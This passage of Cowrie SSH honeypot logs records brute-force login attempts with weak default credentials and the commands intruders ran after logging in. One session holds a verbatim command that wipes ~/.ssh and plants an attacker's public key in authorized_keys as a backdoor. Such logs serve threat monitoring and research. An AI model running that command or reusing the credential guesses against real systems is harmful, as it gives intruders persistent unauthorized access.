"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:48:11.468406Z","src_ip":"212.227.235.229","session":"a69771c584ce"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"admin123","message":"login attempt [administrator/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:48:11.898374Z","src_ip":"43.159.36.188","session":"e647da7a2421"}
{"eventid":"cowrie.login.success","username":"root","password":"newton","message":"login attempt [root/newton] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:48:12.629746Z","src_ip":"212.227.235.229","session":"a69771c584ce"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:48:13.151134Z","src_ip":"43.159.36.188","session":"e647da7a2421"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:48:13.210325Z","src_ip":"212.227.235.229","session":"a69771c584ce"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:48:13.211266Z","src_ip":"212.227.235.229","session":"a69771c584ce"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:48:13.212573Z","src_ip":"212.227.235.229","session":"a69771c584ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:48:13.493240Z","src_ip":"212.227.235.229","session":"a69771c584ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:48:14.116242Z","src_ip":"212.227.235.229","session":"a69771c584ce"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:48:14.116964Z","src_ip":"212.227.235.229","session":"a69771c584ce"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:48:14.399717Z","src_ip":"212.227.235.229","session":"a69771c584ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:48:14.400929Z","src_ip":"212.227.235.229","session":"a69771c584ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45894,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a501b823785","protocol":"ssh","message":"New connection: 212.227.235.229:45894 (1.2.3.4:22) [session: 4a501b823785]","sensor":"my-vps","timestamp":"2025-08-31T05:48:14.664557Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:48:14.665591Z","src_ip":"212.227.235.229","session":"4a501b823785"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:48:14.933815Z","src_ip":"212.227.235.229","session":"4a501b823785"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:48:16.046055Z","src_ip":"212.227.235.229","session":"4a501b823785"}
{"eventid":"cowrie.login.failed","username":"git","password":"123","message":"login attempt [git/123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:48:16.914109Z","src_ip":"212.227.235.229","session":"9aa9a4f4cfea"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:48:17.316173Z","src_ip":"212.227.235.229","session":"4a501b823785"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45902,"dst_ip":"1.2.3.4","dst_port":22,"session":"95adf1686286","protocol":"ssh","message":"New connection: 212.227.235.229:45902 (1.2.3.4:22) [session: 95adf1686286]","sensor":"my-vps","timestamp":"2025-08-31T05:48:17.583313Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:48:17.584223Z","src_ip":"212.227.235.229","session":"95adf1686286"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:48:17.852562Z","src_ip":"212.227.235.229","session":"95adf1686286"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:48:18.968201Z","src_ip":"212.227.235.229","session":"95adf1686286"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:48:19.238203Z","src_ip":"212.227.235.229","session":"95adf1686286"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:48:19.240375Z","src_ip":"212.227.235.229","session":"a69771c584ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34494,"dst_ip":"1.2.3.4","dst_port":22,"session":"86ced795f9f2","protocol":"ssh","message":"New connection: 212.227.235.229:34494 (1.2.3.4:22) [session: 86ced795f9f2]","sensor":"my-vps","timestamp":"2025-08-31T05:48:22.071808Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38882,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dae94cb4e93","protocol":"ssh","message":"New connection: 212.227.235.229:38882 (1.2.3.4:22) [session: 4dae94cb4e93]","sensor":"my-vps","timestamp":"2025-08-31T05:48:23.645961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:48:23.647012Z","src_ip":"212.227.235.229","session":"4dae94cb4e93"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:48:23.905022Z","src_ip":"212.227.235.229","session":"4dae94cb4e93"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Password01","message":"login attempt [admin/Password01] failed","sensor":"my-vps","timestamp":"2025-08-31T05:48:24.972543Z","src_ip":"212.227.235.229","session":"4dae94cb4e93"}
{"eventid":"cowrie.session.closed","duration":"74.3","message":"Connection lost after 74.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:48:25.400248Z","src_ip":"212.227.235.229","session":"9aa9a4f4cfea"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:48:26.232118Z","src_ip":"212.227.235.229","session":"4dae94cb4e93"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":37976,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4fe40516e32","protocol":"ssh","message":"New connection: 170.64.166.123:37976 (1.2.3.4:22) [session: d4fe40516e32]","sensor":"my-vps","timestamp":"2025-08-31T05:48:32.461788Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:48:32.462574Z","src_ip":"170.64.166.123","session":"d4fe40516e32"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:48:32.741535Z","src_ip":"170.64.166.123","session":"d4fe40516e32"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:48:33.355707Z","src_ip":"212.227.235.229","session":"86ced795f9f2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:48:33.356693Z","src_ip":"212.227.235.229","session":"86ced795f9f2"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"qwertyasdfgh","message":"login attempt [ubuntu/qwertyasdfgh] failed","sensor":"my-vps","timestamp":"2025-08-31T05:48:33.858923Z","src_ip":"170.64.166.123","session":"d4fe40516e32"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35160,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad124e4a6bd3","protocol":"ssh","message":"New connection: 212.227.235.229:35160 (1.2.3.4:22) [session: ad124e4a6bd3]","sensor":"my-vps","timestamp":"2025-08-31T05:48:34.252053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:48:34.926008Z","src_ip":"212.227.235.229","session":"ad124e4a6bd3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:48:34.926753Z","src_ip":"212.227.235.229","session":"ad124e4a6bd3"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:48:35.140826Z","src_ip":"170.64.166.123","session":"d4fe40516e32"}
{"eventid":"cowrie.login.failed","username":"test2","password":"password1","message":"login attempt [test2/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:48:40.425874Z","src_ip":"212.227.235.229","session":"ad124e4a6bd3"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:48:42.355115Z","src_ip":"212.227.235.229","session":"ad124e4a6bd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43764,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3f28781bec6","protocol":"ssh","message":"New connection: 212.227.125.160:43764 (1.2.3.4:22) [session: c3f28781bec6]","sensor":"my-vps","timestamp":"2025-08-31T05:48:49.589307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:48:51.160031Z","src_ip":"212.227.125.160","session":"c3f28781bec6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:48:51.161717Z","src_ip":"212.227.125.160","session":"c3f28781bec6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53628,"dst_ip":"1.2.3.4","dst_port":22,"session":"f148041d5b5e","protocol":"ssh","message":"New connection: 212.227.125.160:53628 (1.2.3.4:22) [session: f148041d5b5e]","sensor":"my-vps","timestamp":"2025-08-31T05:48:55.125447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:48:55.776214Z","src_ip":"212.227.125.160","session":"f148041d5b5e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:48:55.777347Z","src_ip":"212.227.125.160","session":"f148041d5b5e"}
{"eventid":"cowrie.login.success","username":"root","password":"roxy1964","message":"login attempt [root/roxy1964] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:48:57.613167Z","src_ip":"212.227.125.160","session":"c3f28781bec6"}
{"eventid":"cowrie.login.failed","username":"test2","password":"password1","message":"login attempt [test2/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:48:57.745774Z","src_ip":"212.227.125.160","session":"f148041d5b5e"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:48:59.149385Z","src_ip":"212.227.125.160","session":"f148041d5b5e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:48:59.498867Z","src_ip":"212.227.125.160","session":"c3f28781bec6"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-31T05:48:59.499528Z","src_ip":"212.227.125.160","session":"c3f28781bec6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:00.611948Z","src_ip":"212.227.125.160","session":"c3f28781bec6"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:49:00.613022Z","src_ip":"212.227.125.160","session":"c3f28781bec6"}
